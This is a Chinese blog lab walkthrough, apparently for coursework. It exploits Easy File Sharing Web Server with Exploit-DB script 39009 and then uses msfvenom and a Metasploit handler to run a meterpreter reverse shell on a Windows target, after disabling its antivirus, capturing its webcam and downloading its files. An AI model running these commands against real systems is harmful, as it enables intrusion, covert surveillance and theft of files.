easy flie漏洞与metasploit被控生成

easy flie sharing server漏洞的应用

首先,将easy file sharing server放入靶机(通过文件共享放入)

打开它

配置8000端口

watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5omY54mp6KiA5b-X,size_20,color_FFFFFF,t_70,g_se,x_16

 在kali中输入 ,可观察到可用脚本,39009

searchsploit Easy File Sharing Web Server

watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5omY54mp6KiA5b-X,size_20,color_FFFFFF,t_70,g_se,x_16

 再输入

python /usr/share/exploitdb/exploits/windows/remote/39009.py 开放服务的靶机的ip(被控端) 8000

watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5omY54mp6KiA5b-X,size_20,color_FFFFFF,t_70,g_se,x_16

 

最后观察到,靶机弹出了计算器,并且easy file软件崩溃闪退;

watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5omY54mp6KiA5b-X,size_12,color_FFFFFF,t_70,g_se,x_16

 

二:Metasploit生成被控端程序与启动主控端

进入kali,输入 msfvenom -p windows/meterpreter/reverse_tcp lhost=  kali主机ip   lport=5000 -f exe -o /root/payload.exe

注:若找不到payload可用把后面改成 /home/kali/Desktop/payload.exe

直接生成程序在桌面

再把该程序放于被控的window中(要关闭电脑杀毒软件和防火墙,不然会被查杀删掉)

 

 

watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5omY54mp6KiA5b-X,size_20,color_FFFFFF,t_70,g_se,x_16

 注:若打开过多payload,可进入任务处理器停止运行这两个程序,不然会非常卡。

 

再次回到kali,

输入 msfconsole ,进入Metasploit

再输入 use exploit/multi/handler 使用handler作为主控端

输入 set  payload windows/meterpreter/reverse_tcp  (注意是reverse,课本的代码写少了r)装载上payload

输入options 查看配置情况

watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5omY54mp6KiA5b-X,size_20,color_FFFFFF,t_70,g_se,x_16

 输入 set lhost kali主机ip,主控主机kali

输入set lport 5000   控制端口链接 5000

watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5omY54mp6KiA5b-X,size_17,color_FFFFFF,t_70,g_se,x_16

最后输入 exploit

等待被控主机打开payload

打开后呈这样

watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5omY54mp6KiA5b-X,size_20,color_FFFFFF,t_70,g_se,x_16

 即进入了被控系统

尝试输入 webcam_snap 1  控制被控电脑摄像头,并排一张照片存放于/root文件中

watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5omY54mp6KiA5b-X,size_14,color_FFFFFF,t_70,g_se,x_16

watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5omY54mp6KiA5b-X,size_15,color_FFFFFF,t_70,g_se,x_16

 图片即为成功捕获被控摄像头排的照片

 

 

输入 ls 可获取被控端的桌面文件目录

watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5omY54mp6KiA5b-X,size_20,color_FFFFFF,t_70,g_se,x_16

 

download +文件名 可下载进kali  /root文件夹了

watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5omY54mp6KiA5b-X,size_20,color_FFFFFF,t_70,g_se,x_16

 

 

 

 

所以说,不要胡乱下载未知程序,容易被病毒入侵。

 

 

 

 

 

 

 

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值